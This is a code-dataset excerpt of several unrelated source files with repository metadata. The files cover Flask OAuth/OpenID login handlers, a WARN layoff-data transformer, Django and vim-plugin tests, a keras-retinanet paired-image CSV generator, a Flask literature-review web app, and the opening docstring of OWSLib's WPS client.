login_method = request.form.get('login')
if login_method == 'musicbrainz':
return musicbrainz_login()
elif login_method == 'google':
return google_login()
elif login_method == 'openid':
return openid_login()
return render_template('login.html', errors=errors,
return_url=request.values.get('return_url'))
def find_or_create_musicbrainz_user(mb_user_name):
user = db.session.query(Account).filter_by(mbuser=mb_user_name).first()
if user is not None:
return user
user = Account()
user.name = mb_user_name
user.mbuser = mb_user_name
user.apikey = generate_api_key()
user.submission_count = 0
db.session.add(user)
db.session.flush()
return user
def login_user_and_redirect(user_id, return_url=None):
session['id'] = user_id
if not return_url:
return_url = request.values.get('return_url')
if return_url and is_our_url(return_url):
return redirect(return_url)
return redirect(url_for('general.index'))
def handle_musicbrainz_oauth2_login():
musicbrainz = OAuth2Service(
name='musicbrainz',
client_id=current_app.config['MB_OAUTH_CLIENT_ID'],
client_secret=current_app.config['MB_OAUTH_CLIENT_SECRET'],
base_url='https://musicbrainz.org',
authorize_url='https://musicbrainz.org/oauth2/authorize',
access_token_url='https://musicbrainz.org/oauth2/token',
)
serializer = URLSafeSerializer(current_app.config['SECRET_KEY'])
code = request.args.get('code')
if not code:
token = str(random.getrandbits(64))
session['mb_login_token'] = token
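        # the random token is round-tripped through the OAuth2 ``state`` parameter and
        # re-checked on the redirect back, guarding the callback against CSRF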
url = musicbrainz.get_authorize_url(**{
'response_type': 'code',
'scope': 'profile',
'redirect_uri': url_for('.musicbrainz_login', _external=True),
'state': serializer.dumps({
'return_url': request.values.get('return_url'),
'token': token,
}),
})
return redirect(url)
serialized_state = request.args.get('state')
if serialized_state:
state = serializer.loads(serialized_state)
else:
state = {}
token = session.get('mb_login_token')
if not token:
raise Exception('token not found in session')
if token != state.get('token'):
raise Exception('token from session does not match token from oauth2 state')
auth_session = musicbrainz.get_auth_session(data={
'grant_type': 'authorization_code',
'code': code,
'redirect_uri': url_for('.musicbrainz_login', _external=True),
}, decoder=json.loads)
response = auth_session.get('oauth2/userinfo').json()
user = find_or_create_musicbrainz_user(response['sub'])
logger.info('MusicBrainz user %s "%s" logged in', user.id, user.name)
return login_user_and_redirect(user.id, return_url=state.get('return_url'))
@user_page.route('/login/musicbrainz')
def musicbrainz_login():
try:
response = handle_musicbrainz_oauth2_login()
db.session.commit()
except Exception:
logger.exception('MusicBrainz login failed')
db.session.rollback()
return redirect(url_for('.login', error='MusicBrainz login failed'))
return response
def handle_openid_login_request():
openid_url = request.form['openid_identifier']
try:
consumer = openid.Consumer(session, None)
openid_req = consumer.begin(openid_url)
except openid.DiscoveryFailure:
logger.exception('Error in OpenID discovery')
raise
else:
if openid_req is None:
raise Exception('No OpenID services found for the given URL')
else:
ax_req = ax.FetchRequest()
ax_req.add(ax.AttrInfo('http://schema.openid.net/contact/email',
alias='email'))
ax_req.add(ax.AttrInfo('http://axschema.org/namePerson/friendly',
alias='nickname'))
openid_req.addExtension(ax_req)
url = openid_req.redirectURL(get_openid_realm(),
url_for('.openid_login', return_url=request.values.get('return_url'), _external=True))
return redirect(url)
raise Exception('OpenID login failed')
def handle_openid_login_response():
conn = db.session.connection()
consumer = openid.Consumer(session, None)
info = consumer.complete(request.args, request.url)
if info.status == openid.SUCCESS:
openid_url = info.identity_url
values = {}
ax_resp = ax.FetchResponse.fromSuccessResponse(info)
if ax_resp:
attrs = {
'email': 'http://schema.openid.net/contact/email',
'name': 'http://schema.openid.net/namePerson/friendly',
}
for name, uri in attrs.iteritems():
try:
value = ax_resp.getSingle(uri)
if value:
values[name] = value
except KeyError:
pass
account_id = lookup_account_id_by_openid(conn, openid_url)
if not account_id:
account_id, account_api_key = insert_account(conn, {
'name': 'OpenID User',
'openid': openid_url,
})
logger.info("Successfuly identified OpenID user %s (%d) with email '%s' and nickname '%s'",
openid_url, account_id, values.get('email', ''), values.get('name', ''))
return login_user_and_redirect(account_id)
elif info.status == openid.CANCEL:
raise Exception('OpenID login has been canceled')
else:
raise Exception('OpenID login failed')
def handle_openid_login():
if 'openid.mode' in request.args:
return handle_openid_login_response()
else:
return handle_openid_login_request()
@user_page.route('/login/openid')
def openid_login():
try:
response = handle_openid_login()
db.session.commit()
except Exception:
logger.exception('OpenID login failed')
db.session.rollback()
return redirect(url_for('.login', error='OpenID login failed'))
return response
def get_openid_realm():
return url_for('general.index', _external=True).rstrip('/')
def find_or_create_google_user(google_user_id, openid=None):
user = db.session.query(Account).join(AccountGoogle).\
filter(AccountGoogle.google_user_id == google_user_id).first()
if user is not None:
return user
if openid is not None:
user = db.session.query(Account).join(AccountOpenID).\
filter(AccountOpenID.openid == openid).first()
if user is not None:
db.session.query(AccountOpenID).\
filter(AccountOpenID.openid == openid).delete()
logger.info("Migrated OpenID user %s to Google user %s", openid, google_user_id)
if user is None:
user = Account()
user.name = 'Google Account'
user.apikey = generate_api_key()
user.submission_count = 0
db.session.add(user)
db.session.flush()
logger.info("Created user %s (%s)", user.id, user.name)
google_user = AccountGoogle()
google_user.account = user
google_user.google_user_id = google_user_id
db.session.add(google_user)
logger.info("Associated user %s (%s) with Google user %s", user.id, user.name, google_user_id)
return user
def handle_google_oauth2_login():
google = OAuth2Service(
name='google',
client_id=current_app.config['GOOGLE_OAUTH_CLIENT_ID'],
client_secret=current_app.config['GOOGLE_OAUTH_CLIENT_SECRET'],
base_url='https://google.com',
authorize_url='https://accounts.google.com/o/oauth2/auth',
access_token_url='https://www.googleapis.com/oauth2/v3/token',
)
code = request.args.get('code')
if not code:
url = google.get_authorize_url(**{
'response_type': 'code',
'access_type': 'online',
'scope': 'openid',
'redirect_uri': url_for('.google_login', _external=True),
'openid.realm': get_openid_realm(),
})
return redirect(url)
response = json.loads(google.get_raw_access_token(data={
'grant_type': 'authorization_code',
'code': code,
'redirect_uri': url_for('.google_login', _external=True),
}).content)
    header, payload, signature = str(response['id_token']).split('.')
    # the JWT payload is unpadded base64url; restore the '=' padding before decoding
    payload += '=' * (-len(payload) % 4)
id_token = json.loads(base64.urlsafe_b64decode(payload))
user = find_or_create_google_user(
id_token['sub'], id_token.get('openid_id'))
logger.info('Google user %s "%s" logged in', user.id, user.name)
return login_user_and_redirect(user.id)
@user_page.route('/login/google')
def google_login():
try:
response = handle_google_oauth2_login()
db.session.commit()
except Exception:
logger.exception('Google login failed')
db.session.rollback()
return redirect(url_for('.login', error='Google authentication failed'))
return response
@user_page.route('/logout')
def logout():
if 'id' in session:
del session['id']
return redirect(url_for('general.index'))
@user_page.route('/api-key')
def api_key():
user = require_user()
return render_template('apikey.html', title='Your API Key',
apikey=user.apikey)
@user_page.route('/new-api-key')
def new_api_key():
user = require_user()
user.apikey = generate_api_key()
db.session.commit()
return redirect(url_for('.api_key'))
| 33.136905
| 102
| 0.65529
|
1903cc3eecd36054eed8682d76b0a1dbdc45ce2e
| 2,084
|
py
|
Python
|
warn_transformer/transformers/ak.py
|
chriszs/warn-transformer
|
62b6dc9116a81daefff424e2118e4a66ee642ba3
|
[
"Apache-2.0"
] | 3
|
2022-02-18T22:21:00.000Z
|
2022-03-24T21:24:29.000Z
|
warn_transformer/transformers/ak.py
|
chriszs/warn-transformer
|
62b6dc9116a81daefff424e2118e4a66ee642ba3
|
[
"Apache-2.0"
] | 20
|
2022-02-20T01:00:07.000Z
|
2022-03-25T18:18:56.000Z
|
warn_transformer/transformers/ak.py
|
chriszs/warn-transformer
|
62b6dc9116a81daefff424e2118e4a66ee642ba3
|
[
"Apache-2.0"
] | 2
|
2022-02-25T02:50:00.000Z
|
2022-03-14T16:32:22.000Z
|
import typing
from datetime import datetime
from ..schema import BaseTransformer
class Transformer(BaseTransformer):
"""Transform Alaska raw data for consolidation."""
postal_code = "AK"
fields = dict(
company="Company",
location="Location",
notice_date="Notice Date",
effective_date="Layoff Date",
jobs="Employees Affected",
)
date_format = "%m/%d/%y"
date_corrections = {
"9/30/20*": datetime(2020, 9, 30),
"August-November 2021": datetime(2021, 8, 1),
"4/1/20 5/31/20": datetime(2020, 4, 1),
"Varied": None,
"March to May 2016": datetime(2016, 3, 1),
"various": None,
}
jobs_corrections = {
"Up to 300": 300,
}
def transform_date(self, value: str) -> typing.Optional[str]:
"""Transform a raw date string into a date object.
Args:
value (str): The raw date string provided by the source
        Returns: A date string ready for consolidation, or None if the raw value cannot be parsed.
"""
try:
dt = self.date_corrections[value]
if dt:
return str(dt.date())
else:
assert dt is None
return dt
except KeyError:
pass
value = value.strip()
value = value.split(" to ")[0].strip()
value = value.replace("Starting ", "").strip()
return super().transform_date(value)
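    # Illustrative behaviour of transform_date (values from the correction table above;
    # construction of the transformer itself depends on BaseTransformer and is omitted):
    #
    #     self.transform_date("9/30/20*")         # -> "2020-09-30" via date_corrections
    #     self.transform_date("Varied")           # -> None (explicitly marked uncorrectable)
    #     self.transform_date("Starting 4/1/20")  # -> parsed as 4/1/20 after stripping the prefix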
def check_if_temporary(self, row: typing.Dict) -> typing.Optional[bool]:
"""Determine whether a row is a temporary or not.
Args:
row (dict): The raw row of data.
Returns: A boolean or null
"""
return "temporary" in row["Notes"].lower() or None
def check_if_closure(self, row: typing.Dict) -> typing.Optional[bool]:
"""Determine whether a row is a closure or not.
Args:
row (dict): The raw row of data.
Returns: A boolean or null
"""
return "closure" in row["Notes"].lower() or None
| 28.944444
| 98
| 0.56382
|
63da5f1971dd5050ed3ea04dacf71b02630ce3b9
| 2,735
|
py
|
Python
|
app/core/tests/test_models.py
|
andrewtdunn/recipe-app-api
|
f46775563b32399d792fb2f93801e9432ef0a71a
|
[
"MIT"
] | null | null | null |
app/core/tests/test_models.py
|
andrewtdunn/recipe-app-api
|
f46775563b32399d792fb2f93801e9432ef0a71a
|
[
"MIT"
] | null | null | null |
app/core/tests/test_models.py
|
andrewtdunn/recipe-app-api
|
f46775563b32399d792fb2f93801e9432ef0a71a
|
[
"MIT"
] | null | null | null |
from unittest.mock import patch
from django.test import TestCase
from django.contrib.auth import get_user_model
from core import models
def sample_user(email='test@andrewtdunn.com', password='testpass'):
"""Create a sample user."""
return get_user_model().objects.create_user(email, password)
class ModelTests(TestCase):
def test_create_user_with_email_successful(self):
"""Test creating a new user with an email is successful."""
email = "test@andrewtdunn.com"
password = "Testpass123"
user = get_user_model().objects.create_user(
email=email,
password=password
)
self.assertEqual(user.email, email)
self.assertTrue(user.check_password(password))
def test_new_user_email_normalized(self):
"""Test the email for a new user is normalized."""
email = "test@ANDREWTDUNN.COM"
user = get_user_model().objects.create_user(email, "TEST123")
self.assertEqual(user.email, user.email.lower())
def test_new_user_invalid_email(self):
"""Test creating user with no email raises error"""
with self.assertRaises(ValueError):
get_user_model().objects.create_user(None, "Password123")
def test_create_new_superuser(self):
"""Test creating a new superuser."""
user = get_user_model().objects.create_superuser(
'test@andrewtdunn.com',
'test123'
)
self.assertTrue(user.is_superuser)
self.assertTrue(user.is_staff)
def test_tag_str(self):
"""Test tag stream representation."""
tag = models.Tag.objects.create(
user=sample_user(),
name='Vegan',
)
self.assertEqual(str(tag), tag.name)
def test_ingredient_str(self):
"""Test the ingredient string representation"""
ingredient = models.Ingredient.objects.create(
user=sample_user(),
name='Cucumber'
)
self.assertEqual(str(ingredient), ingredient.name)
def test_recipe_str(self):
"""Test the recipe string representation"""
recipe = models.Recipe.objects.create(
user=sample_user(),
title='Steak and Mushroom Sauce',
time_minutes=5,
price=5.00
)
self.assertEqual(str(recipe), recipe.title)
@patch('uuid.uuid4')
def test_recipe_file_name_uuid(self, mock_uuid):
"""Test that image is saved in the correct location"""
uuid = 'test-uuid'
mock_uuid.return_value = uuid
file_path = models.recipe_image_file_path(None, 'myimage.jpg')
exp_path = f'uploads/recipe/{uuid}.jpg'
self.assertEqual(file_path, exp_path)
| 32.176471
| 70
| 0.640585
|
c7ece0246694c9bc4eebbe4f69e5888bf801180b
| 1,579
|
py
|
Python
|
pythonx/vim_textobj_block_party/block_party/tests/test_search.py
|
ColinKennedy/vim-textobj-block-party
|
c3132b63840d2ff9719e3972dd8e5548d40165c5
|
[
"MIT"
] | 7
|
2018-10-22T14:10:08.000Z
|
2020-05-16T18:07:07.000Z
|
pythonx/vim_textobj_block_party/block_party/tests/test_search.py
|
ColinKennedy/vim-textobj-block-party
|
c3132b63840d2ff9719e3972dd8e5548d40165c5
|
[
"MIT"
] | 5
|
2018-10-22T18:53:41.000Z
|
2018-12-31T18:54:04.000Z
|
pythonx/vim_textobj_block_party/block_party/tests/test_search.py
|
ColinKennedy/vim-textobj-block-party
|
c3132b63840d2ff9719e3972dd8e5548d40165c5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''Any test that is related to inspecting Python source-code.'''
# IMPORT STANDARD LIBRARIES
import textwrap
# IMPORT THIRD-PARTY LIBRARIES
from block_party import config
# IMPORT LOCAL LIBRARIES
from . import common
class Blocks(common.Common):
'''A series of tests for finding lines that are related to the current block.'''
def setUp(self):
'''Reset the user's config before every test.'''
super(Blocks, self).setUp()
config.reset()
def test_search_off(self):
'''Run a test without searching.'''
code = textwrap.dedent(
'''\
items = [x for x in whatever]
|start|for index in items:
print('running')
# foobar
|cursor|
print('index {}'.format(index))|end|
last = 'bit is here'
'''
)
self.compare(code)
def test_search_whitespace(self):
'''Run a test with searching and whitespace allowed.'''
config.register_setting(config.WHITESPACE_KEY, lambda: True)
config.register_setting(config.SEARCH_KEY, lambda: False)
code = textwrap.dedent(
'''\
items = [x for x in whatever]
|start|
for index in items:
print('running')
# foobar
|cursor|
print('index {}'.format(index))|end|
last = 'bit is here'
'''
)
self.compare(code, search=True)
| 22.557143
| 84
| 0.540215
|
a510bc119b6a87c9bb2499e1bd99a24776bff55d
| 8,225
|
py
|
Python
|
keras_retinanet/preprocessing/csv_generator.py
|
Sid51/keras-retinanet
|
3bf7ad6aad0a5d55b7c3a7b81fb6f151042659cc
|
[
"Apache-2.0"
] | null | null | null |
keras_retinanet/preprocessing/csv_generator.py
|
Sid51/keras-retinanet
|
3bf7ad6aad0a5d55b7c3a7b81fb6f151042659cc
|
[
"Apache-2.0"
] | null | null | null |
keras_retinanet/preprocessing/csv_generator.py
|
Sid51/keras-retinanet
|
3bf7ad6aad0a5d55b7c3a7b81fb6f151042659cc
|
[
"Apache-2.0"
] | null | null | null |
"""
Copyright 2017-2018 yhenon (https://github.com/yhenon/)
Copyright 2017-2018 Fizyr (https://fizyr.com)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from .generator import Generator
from ..utils.image import read_image_bgr
import numpy as np
from PIL import Image
from six import raise_from
import csv
import sys
import os.path
from collections import OrderedDict
def _parse(value, function, fmt):
"""
Parse a string into a value, and format a nice ValueError if it fails.
Returns `function(value)`.
    Any `ValueError` raised is caught and a new `ValueError` is raised
with message `fmt.format(e)`, where `e` is the caught `ValueError`.
"""
try:
return function(value)
except ValueError as e:
raise_from(ValueError(fmt.format(e)), None)
def _read_classes(csv_reader):
""" Parse the classes file given by csv_reader.
"""
result = OrderedDict()
for line, row in enumerate(csv_reader):
line += 1
try:
class_name, class_id = row
except ValueError:
raise_from(ValueError('line {}: format should be \'class_name,class_id\''.format(line)), None)
class_id = _parse(class_id, int, 'line {}: malformed class ID: {{}}'.format(line))
if class_name in result:
raise ValueError('line {}: duplicate class name: \'{}\''.format(line, class_name))
result[class_name] = class_id
return result
def _read_annotations(csv_reader, classes):
""" Read annotations from the csv_reader.
"""
result = OrderedDict()
for line, row in enumerate(csv_reader):
line += 1
try:
img_file1, img_file2, x1, y1, x2, y2, class_name = row[:7]
except ValueError:
raise_from(ValueError('line {}: format should be \'img_file1,img_file2,x1,y1,x2,y2,class_name\' '
'or \'img_file1,img_file2,,,,,\''.format(line)), None)
img_key = img_file1 + "@" + img_file2
if img_key not in result:
result[img_key] = []
# If a row contains only an image path, it's an image without annotations.
if (x1, y1, x2, y2, class_name) == ('', '', '', '', ''):
continue
x1 = _parse(x1, int, 'line {}: malformed x1: {{}}'.format(line))
y1 = _parse(y1, int, 'line {}: malformed y1: {{}}'.format(line))
x2 = _parse(x2, int, 'line {}: malformed x2: {{}}'.format(line))
y2 = _parse(y2, int, 'line {}: malformed y2: {{}}'.format(line))
# Check that the bounding box is valid.
if x2 <= x1:
raise ValueError('line {}: x2 ({}) must be higher than x1 ({})'.format(line, x2, x1))
if y2 <= y1:
raise ValueError('line {}: y2 ({}) must be higher than y1 ({})'.format(line, y2, y1))
# check if the current class name is correctly present
if class_name not in classes:
raise ValueError('line {}: unknown class name: \'{}\' (classes: {})'.format(line, class_name, classes))
result[img_key].append({'x1': x1, 'x2': x2, 'y1': y1, 'y2': y2, 'class': class_name})
return result
def _open_for_csv(path):
""" Open a file with flags suitable for csv.reader.
    For Python 2 this means opening with mode 'rb';
    for Python 3 it means mode 'r' with "universal newlines".
"""
if sys.version_info[0] < 3:
return open(path, 'rb')
else:
return open(path, 'r', newline='', encoding='utf-8-sig')
class CSVGenerator(Generator):
""" Generate data for a custom CSV dataset.
See https://github.com/fizyr/keras-retinanet#csv-datasets for more information.
"""
def __init__(
self,
csv_data_file,
csv_class_file,
base_dir=None,
**kwargs
):
""" Initialize a CSV data generator.
Args
csv_data_file: Path to the CSV annotations file.
csv_class_file: Path to the CSV classes file.
base_dir: Directory w.r.t. where the files are to be searched (defaults to the directory containing the csv_data_file).
"""
self.image_names = []
self.image_data = {}
self.base_dir = base_dir
# Take base_dir from annotations file if not explicitly specified.
if self.base_dir is None:
self.base_dir = os.path.dirname(csv_data_file)
# parse the provided class file
try:
with _open_for_csv(csv_class_file) as file:
self.classes = _read_classes(csv.reader(file, delimiter=','))
except ValueError as e:
raise_from(ValueError('invalid CSV class file: {}: {}'.format(csv_class_file, e)), None)
self.labels = {}
for key, value in self.classes.items():
self.labels[value] = key
# csv with img_path, x1, y1, x2, y2, class_name
try:
with _open_for_csv(csv_data_file) as file:
self.image_data = _read_annotations(csv.reader(file, delimiter=','), self.classes)
except ValueError as e:
raise_from(ValueError('invalid CSV annotations file: {}: {}'.format(csv_data_file, e)), None)
self.image_names = list(self.image_data.keys())
super(CSVGenerator, self).__init__(**kwargs)
def size(self):
""" Size of the dataset.
"""
return len(self.image_names)
def num_classes(self):
""" Number of classes in the dataset.
"""
return max(self.classes.values()) + 1
def has_label(self, label):
""" Return True if label is a known label.
"""
return label in self.labels
def has_name(self, name):
""" Returns True if name is a known class.
"""
return name in self.classes
def name_to_label(self, name):
""" Map name to label.
"""
return self.classes[name]
def label_to_name(self, label):
""" Map label to name.
"""
return self.labels[label]
def image_path(self, image_index):
""" Returns the image path for image_index.
"""
return os.path.join(self.base_dir, self.image_names[image_index])
def two_images_path(self, image_index):
""" Returns the image paths of two images for image_index.
"""
img1, img2 = self.image_names[image_index].split('@')
img1_path = os.path.join(self.base_dir, img1)
img2_path = os.path.join(self.base_dir, img2)
return img1_path, img2_path
def image_aspect_ratio(self, image_index):
""" Compute the aspect ratio for an image with image_index.
"""
# PIL is fast for metadata
image = Image.open(self.two_images_path(image_index)[0])
return float(image.width) / float(image.height)
def load_image(self, image_index):
""" Load two images at the image_index.
"""
img1_path, img2_path = self.two_images_path(image_index)
img1 = read_image_bgr(img1_path)
img2 = read_image_bgr(img2_path)
return [img1, img2]
def load_annotations(self, image_index):
""" Load annotations for an image_index.
"""
path = self.image_names[image_index]
annotations = {'labels': np.empty((0,)), 'bboxes': np.empty((0, 4))}
for idx, annot in enumerate(self.image_data[path]):
annotations['labels'] = np.concatenate((annotations['labels'], [self.name_to_label(annot['class'])]))
annotations['bboxes'] = np.concatenate((annotations['bboxes'], [[
float(annot['x1']),
float(annot['y1']),
float(annot['x2']),
float(annot['y2']),
]]))
return annotations
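    # Example of the annotation CSV this generator parses (one box per row; an image
    # pair without annotations leaves the box fields empty; file and class names here
    # are illustrative only):
    #
    #     img_0001_a.jpg,img_0001_b.jpg,10,20,110,220,car
    #     img_0002_a.jpg,img_0002_b.jpg,,,,,
    #
    # and of the matching classes CSV:
    #
    #     car,0
    #     person,1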
| 34.414226
| 131
| 0.610213
|
562996b35f661c3a718fa2eebfb78bae22de2c5a
| 9,016
|
py
|
Python
|
app.py
|
TimeWz667/LitReviewer
|
89574914c8148d758d82325b9dbff26bc6d6f1cc
|
[
"MIT"
] | null | null | null |
app.py
|
TimeWz667/LitReviewer
|
89574914c8148d758d82325b9dbff26bc6d6f1cc
|
[
"MIT"
] | null | null | null |
app.py
|
TimeWz667/LitReviewer
|
89574914c8148d758d82325b9dbff26bc6d6f1cc
|
[
"MIT"
] | null | null | null |
from flask import Flask, request, render_template, send_file, session, redirect, url_for, jsonify, Response
import reviewer
__author__ = 'TimeWz667'
abbreviations = ['HIV', 'STD', 'NCD', 'SD', 'DES', 'ABM', 'EBM', 'BMC', 'I', 'II', 'OR',
'SIR', 'SID', 'SEIR', 'SIRS', 'ODE', 'PDE', 'SDE',
'IEEE', 'PLOS', 'WSC', 'JAIDS', 'RIVF', '(RIVF)', '(WSC)']
out_reasons = ['X Topic', 'X Paper Type', 'X Human', 'X Between human',
'X ABM', 'X EBM',
'X Interaction', 'X Sim or Imp']
class ReviewerFlask(Flask):
jinja_options = Flask.jinja_options.copy()
jinja_options.update(dict(
block_start_string='<%',
block_end_string='%>',
variable_start_string='<{',
variable_end_string='}>',
comment_start_string='<#',
comment_end_string='#>'
))
def __init__(self, name, **kwargs):
Flask.__init__(self, name, **kwargs)
self.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
app = ReviewerFlask(__name__)
app.secret_key = 'han han key'
def check_info():
if 'username' not in session:
return redirect(url_for('login'))
username = session.get('username')
if username not in reviewer.Reviewers:
del session['username']
return redirect(url_for('login'))
user = reviewer.Reviewers[username]
if not user.PaperList:
return redirect(url_for('select_project'))
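# check_info() returns a redirect response when the session is missing, the user is
# unknown, or no paper list is attached, and falls through (None) otherwise, so views
# can simply do:
#     check = check_info()
#     if check:
#         return check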
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
username = request.form['UserName']
# todo validate name
session['username'] = username
reviewer.login_reviewer(username)
return redirect(url_for('select_project'))
form = reviewer.LoginForm()
return render_template('Login.html', form=form)
@app.route('/logout', methods=['GET'])
def logout():
username = session.get('username')
reviewer.logout_reviewer(username)
return redirect(url_for('login'))
@app.route('/project', methods=['GET'])
def select_project():
if 'username' not in session:
return redirect(url_for('login'))
reviewer.detach_project(session.get('username'))
new_form = reviewer.NewProjectForm()
new_form.BibFile.choices = reviewer.list_bib()
new_form.FormFile.choices = reviewer.list_form()
load_form = reviewer.LoadProjectForm()
load_form.ProjectFile.choices = reviewer.list_project()
return render_template('Project.html', new_form=new_form, load_form=load_form)
@app.route('/project/load', methods=['POST'])
def load_project():
form = reviewer.LoadProjectForm()
if form.ProjectUpload.has_file():
        _, pro = reviewer.upload_bib(form.ProjectUpload.data)
else:
pro = form.ProjectFile.data
pl_name = reviewer.load_project(pro)
username = session.get('username')
reviewer.attach_project(username, pl_name)
return redirect(url_for('index'))
@app.route('/project/new', methods=['POST'])
def new_project():
form = reviewer.NewProjectForm()
if form.BibUpload.has_file():
_, bib = reviewer.upload_bib(form.BibUpload.data)
else:
bib = form.BibFile.data
if form.FormUpload.has_file():
_, questions = reviewer.upload_form(form.FormUpload.data)
else:
questions = form.FormFile.data
pl_name = reviewer.new_project(form.ProjectName.data, bib, questions, abbreviations)
username = session.get('username')
reviewer.attach_project(username, pl_name)
return redirect(url_for('index'))
@app.route('/')
def index():
check = check_info()
if check:
return check
username = session.get('username')
pro = reviewer.get_project_name(username)
pl = reviewer.find_papers(username)
sts = reviewer.summarise_paper_status(username)
return render_template('PaperList.html', title='List of papers', user=username, obj=pro, sts=sts,
papers=pl)
@app.route('/paper/<paper_id>', methods=['GET', 'POST'])
def read_paper(paper_id):
check = check_info()
if check:
return check
username = session.get('username')
if request.method == 'POST':
reviewer.fetch_data(username, paper_id, request.form)
if 'btn' in request.form:
if request.form['btn'] == 'Save':
pass
elif request.form['btn'] == 'Approve':
reviewer.approve_paper(username, paper_id)
elif request.form['btn'] == 'Disapprove':
reviewer.disapprove_paper(username, paper_id)
elif 'btn-drop' in request.form:
reviewer.drop_paper(username, paper_id, request.form['btn-drop'])
reviewer.save_project(username)
sts = reviewer.summarise_paper_status(username)
sel = reviewer.find_paper(username, paper_id)
tags = reviewer.get_exclusion_tags(username)
hp = 'previous' in sel
prv = '/paper/{}'.format(sel['previous']) if hp else '/'
hn = 'next' in sel
nxt = '/paper/{}'.format(sel['next']) if hn else '/'
return render_template('Paper.html', title=paper_id, user=username, obj=paper_id, sts=sts,
paper=sel['paper'], form=sel['form'], id=paper_id, out_reasons=tags,
has_previous=hp, previous=prv,
has_next=hn, next=nxt)
@app.route('/filter/<status>')
def filter_status(status):
username = session.get('username')
reviewer.filter_papers(username, status, [])
return redirect(url_for('index'))
@app.route('/summary')
def summary():
check = check_info()
if check:
return check
username = session.get('username')
sts = reviewer.summarise_paper_status(username)
return render_template('Summary.html', title='Summary', user=username, obj='summary', sts=sts)
@app.route('/figure/wordcloud/<paper_id>')
def abstract_wc(paper_id):
username = session.get('username')
txt = reviewer.find_paper(username, paper_id, detail=False).Abstract
return send_file(reviewer.make_word_cloud(txt), mimetype='image/png')
@app.route('/figure/wordcloud/')
def abstract_wc_all():
username = session.get('username')
txt = ' '.join(p.Abstract for p in reviewer.find_papers(username))
return send_file(reviewer.make_word_cloud(txt), mimetype='image/png')
@app.route('/exclusion', methods=['GET', 'POST'])
def tags_list():
check = check_info()
if check:
return check
username = session.get('username')
tags = reviewer.get_exclusion_tags(username)
tags = [tag for tag in tags if tag != 'X Topic']
if request.method == 'POST':
if 'btn' in request.form:
if request.form['btn'] == 'Save':
reviewer.save_project(username)
return render_template('Tags.html', tags=tags)
@app.route('/exclusion/add', methods=['POST'])
def add_tag():
check = check_info()
if check:
return check
username = session.get('username')
tags = reviewer.get_exclusion_tags(username)
content = request.form['content']
if not content or content in tags:
return redirect('/exclusion')
tags.append(content)
# reviewer.save_project(username)
return redirect('/exclusion')
@app.route('/exclusion/delete/<tag>')
def delete_tag(tag):
check = check_info()
if check:
return check
username = session.get('username')
tags = reviewer.get_exclusion_tags(username)
tags.remove(tag)
# reviewer.save_project(username)
return redirect('/exclusion')
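# Export endpoints: each renders the current project's results in the requested
# format (CSV, JSON or BibTeX) and returns them as a file download via a
# Content-Disposition "attachment" header.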
@app.route('/output/csv')
def output_csv():
username = session.get('username')
pro = reviewer.get_project_name(username)
csv = reviewer.output_result_csv(username)
return Response(
csv,
mimetype='text/csv',
headers={'Content-disposition':
'attachment; filename={}_{}.csv'.format(username, pro)})
@app.route('/output/json')
def output_json():
username = session.get('username')
pro = reviewer.get_project_name(username)
    json = jsonify(reviewer.output_result_json(username)).get_data(as_text=True)
return Response(
json,
mimetype='application/json',
headers={'Content-disposition':
'attachment; filename={}_{}.json'.format(username, pro)})
@app.route('/output/bib')
def output_bib():
username = session.get('username')
pro = reviewer.get_project_name(username)
bib = reviewer.output_bib(username)
return Response(
bib,
mimetype='text/bib',
headers={'Content-disposition':
'attachment; filename={}_{}.bib'.format(username, pro)})
@app.route('/output/sel_bib')
def output_sel_bib():
username = session.get('username')
pro = reviewer.get_project_name(username)
bib = reviewer.output_select_bib(username)
return Response(
bib,
mimetype='text/bib',
headers={'Content-disposition':
'attachment; filename={}_{}.bib'.format(username, pro)})
if __name__ == '__main__':
app.run(port=300)
| 30.053333
| 107
| 0.642968
|
1521aa2b439eb9c46e342551b8ebc40314d9f022
| 79,861
|
py
|
Python
|
owslib/wps.py
|
jannefleischer/OWSLib
|
e0f82ce01c4f3d18c2e25938987af3e9bcc6ecad
|
[
"BSD-3-Clause"
] | null | null | null |
owslib/wps.py
|
jannefleischer/OWSLib
|
e0f82ce01c4f3d18c2e25938987af3e9bcc6ecad
|
[
"BSD-3-Clause"
] | null | null | null |
owslib/wps.py
|
jannefleischer/OWSLib
|
e0f82ce01c4f3d18c2e25938987af3e9bcc6ecad
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: ISO-8859-15 -*-
# =============================================================================
# Copyright (c) 2018 Luca Cinquini
#
# Authors : Luca Cinquini <luca.cinquini@jpl.nasa.gov>
# Carsten Ehbrecht <ehbrecht@dkrz.de>
#
# Contact email: ehbrecht@dkrz.de
# =============================================================================
"""
Abstract
--------
The wps module of the OWSLib package provides client-side functionality for executing invocations to a remote
Web Processing Server.
Disclaimer
----------
.. warning:: The owslib wps module should be considered in beta state: it has been tested versus only a handful of
WPS services (deployed by the USGS, BADC and PML).
More extensive testing is needed and feedback is appreciated.
Usage
-----
The module can be used to execute three types of requests versus a remote WPS endpoint:
# "GetCapabilities"
* use the method wps.getcapabilities(xml=None)
* the optional keyword argument "xml" may be used to avoid a real live request, and instead read the
WPS capabilities document from a cached XML file
# "DescribeProcess"
* use the method wps.describeprocess(identifier, xml=None)
* identifier is the process identifier, retrieved from the list obtained from a previous
"GetCapabilities" invocation
* the optional keyword argument "xml" may be used to avoid a real live request, and instead read the
WPS process description document from a cached XML file
# "Execute"
* use the method wps.execute(identifier, inputs, output=None, request=None, response=None),
which submits the job to the remote WPS server and returns a WPSExecution object that can be used to periodically
check the job status until completion (or error)
* the optional keyword argument "request" may be used to avoid re-building the request XML from input arguments,
and instead submit a request from a pre-made XML file
* alternatively, an "Execute" request can be built from input arguments by supplying the "identifier", "inputs"
and "output" arguments to the execute() method.
* "identifier" is the mandatory process identifier
* "inputs" is a dictionary of (key,value) pairs where:
* key is a named input parameter
* value is either a string, or any python object that supports a getXml() method
